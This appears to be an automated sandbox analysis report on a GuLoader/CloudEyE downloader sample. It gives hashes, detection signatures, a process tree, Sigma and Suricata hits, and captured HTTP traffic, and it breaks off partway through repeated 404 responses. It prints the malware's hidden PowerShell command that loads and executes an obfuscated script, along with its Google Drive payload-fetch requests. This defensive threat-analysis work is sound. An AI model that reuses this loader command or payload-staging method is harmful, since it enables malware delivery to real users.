
Windows Analysis Report
GyGE2VaBFL.exe

Overview

General Information

Sample name: GyGE2VaBFL.exe (renamed because original name is a hash value)
Original sample name: 0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783.exe
Analysis ID: 1632354
MD5: d8eacf83ca07943696bf5e23528cc348
SHA1: 1aa708342f955f268f43cbd7705dc1497cf91d46
SHA256: 0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783
Tags: exe, user-adrian__luca

Detection

GuLoader
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • GyGE2VaBFL.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\GyGE2VaBFL.exe" MD5: D8EACF83CA07943696BF5E23528CC348)
    • powershell.exe (PID: 7720 cmdline: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6128 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 7896 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000001.00000002.1676887865.000000000ACA8000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: 0000000A.00000002.2415295376.0000000005518000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security

      System Summary

      Source: Network Connection; Author: frack113; Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6128, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49720
      Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7720, TargetFilename: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) ", CommandLine: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\GyGE2VaBFL.exe", ParentImage: C:\Users\user\Desktop\GyGE2VaBFL.exe, ParentProcessId: 7680, ParentProcessName: GyGE2VaBFL.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) ", ProcessId: 7720, ProcessName: powershell.exe
      Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7896, ProcessName: svchost.exe
      Timestamp: 2025-03-07T22:46:43.879482+0100; SID: 2803270; Severity: 2; Classtype: Potentially Bad Traffic; Source IP: 192.168.2.4; Source Port: 49720; Destination IP: 216.58.206.78; Destination Port: 443; Protocol: TCP


      AV Detection

      Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe; Virustotal: Detection: 63%
      Source: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe; ReversingLabs: Detection: 47%
      Source: GyGE2VaBFL.exe; Virustotal: Detection: 63%
      Source: GyGE2VaBFL.exe; ReversingLabs: Detection: 47%
      Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
      Source: GyGE2VaBFL.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknown; HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49720 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49725 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49729 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknown; HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: GyGE2VaBFL.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: ws\System.Core.pdb; source: powershell.exe, 00000001.00000002.1675183518.00000000088C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5; source: powershell.exe, 00000001.00000002.1671040347.000000000771E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb; source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdbk; source: powershell.exe, 00000001.00000002.1665629538.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe; Code function: 0_2_00406448 FindFirstFileA, FindClose; 0_2_00406448
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe; Code function: 0_2_0040589C GetTempPathA, DeleteFileA, lstrcatA, lstrcatA, lstrlenA, FindFirstFileA, FindNextFileA, FindClose; 0_2_0040589C
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exe; Code function: 0_2_004027A1 FindFirstFileA; 0_2_004027A1
      Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49720 -> 216.58.206.78:443
      Source: global traffic; HTTP traffic detected:
        GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Host: drive.google.com
        Cache-Control: no-cache
      Source: global traffic; HTTP traffic detected:
        GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
      Source: global traffic; HTTP traffic detected:
        GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Host: drive.google.com
        Cache-Control: no-cache
        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global traffic; HTTP traffic detected:
        GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic; DNS traffic detected: DNS query: drive.google.com
      Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        X-GUploader-UploadID: AKDAyIsWxfJ9ep40jMuJCWE3_iCcz-DTfuJi2zEY8NZNzPtQZbfn0LlTuGhDL7XqGo7VQNVKWCgj5Q0
        Content-Type: text/html; charset=utf-8
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 07 Mar 2025 21:46:46 GMT
        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
        Cross-Origin-Opener-Policy: same-origin
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Content-Security-Policy: script-src 'nonce-TIrMSrD2oFzpFFAenjnG7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Content-Length: 1652
        Server: UploadServer
        Set-Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw; expires=Sat, 06-Sep-2025 21:46:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Content-Security-Policy: sandbox allow-scripts
        Connection: close
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        X-GUploader-UploadID: AKDAyIv022PTTz3J0-uwB5i7bBoFDqbBWHxyxDaTOjVD5DelXQ9gqCZTIIhsW6smB8SGSpnj3hd7Mgc
        Content-Type: text/html; charset=utf-8
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 07 Mar 2025 21:46:52 GMT
        Cross-Origin-Opener-Policy: same-origin
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Content-Security-Policy: script-src 'nonce-J5C8yTdoURX0iLq7NFAb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Content-Length: 1652
        Server: UploadServer
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Content-Security-Policy: sandbox allow-scripts
        Connection: close
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        X-GUploader-UploadID: AKDAyItTnDh5ERL3h_ztKlKSHNqyfJYtgoYRbkq0LKDEV2O5ggjBZ0Hvy1vD1oo8crzpGMq_
        Content-Type: text/html; charset=utf-8
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 07 Mar 2025 21:46:58 GMT
        Content-Security-Policy: script-src 'nonce-FxrxZZ4bXMxs2Jsie4atMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Cross-Origin-Opener-Policy: same-origin
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Content-Length: 1652
        Server: UploadServer
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Content-Security-Policy: sandbox allow-scripts
        Connection: close
      Source: global traffic; HTTP traffic detected:
        HTTP/1.1 404 Not Found
        X-GUploader-UploadID: AKDAyIsaoa32c76A-_xqUbVnoDoVflbdZHIuptV1S_uXAkeBKmBP9n9j5eQnusSpXTfwbdbS
        Content-Type: text/html; charset=utf-8
        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
        Pragma: no-cache
        Expires: Mon, 01 Jan 1990 00:00:00 GMT
        Date: Fri, 07 Mar 2025 21:47:05 GMT
        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
        Content-Security-Policy: script-src 'nonce-BizmiIQQApVJFRixZbwTPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
        Cross-Origin-Opener-Policy: same-origin
        Content-Length: 1652
        Server: UploadServer
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        Content-Security-Policy: sandbox allow-scripts
        Connection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIvaT_FsB5T4MApT0qYxeqLJQeeG9ZHXoS7IB0dICJjTKDKt8rZL9phS1qsscNTSrq4X8AFt2mgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:11 GMTContent-Security-Policy: script-src 'nonce-FDTODOVFQM1wbLyzoep_zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyItvr43sqFEK18D-MIvr7_JOqqafiMAAvD_0w3qSTROtbcbgoEYNK3g6a4bsjpvxZDnPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:18 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-iQwA3_V-zkBtV6BudbnVRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyItVP6KBCJiYnnOULBs6eXNzoUNh4SL6Vbi6KFTpmIkgw7MpOSWQ54ZQgSxZh5KRwJoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-YZFBQuBGiBlM1orMALjLnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIvYwCVZxydY2udRoMitiYkCKNVVrLFFopZAcWrzVGvK-oHqO3m3QwGH94l8LpO8I9iKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:30 GMTContent-Security-Policy: script-src 'nonce-HT1WniQf0xtBizMk7m7kpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIuNwpgJXkb925lt9bAaJn-vUWDMXE4svscOc1746wY98sbh_s2h8nCf4uNKelxuR8UjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:37 GMTContent-Security-Policy: script-src 'nonce-mE0d6xhnKeeJk3E3M0ASRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIv15-NRjJR3BIyRs6pF_7U5SaxGjedX1GDvVZU7YiFslTeq-Fc3E03O_CYZJAQUhVhCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:46 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9P5cL0hea1LIuPxPmtfhnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, 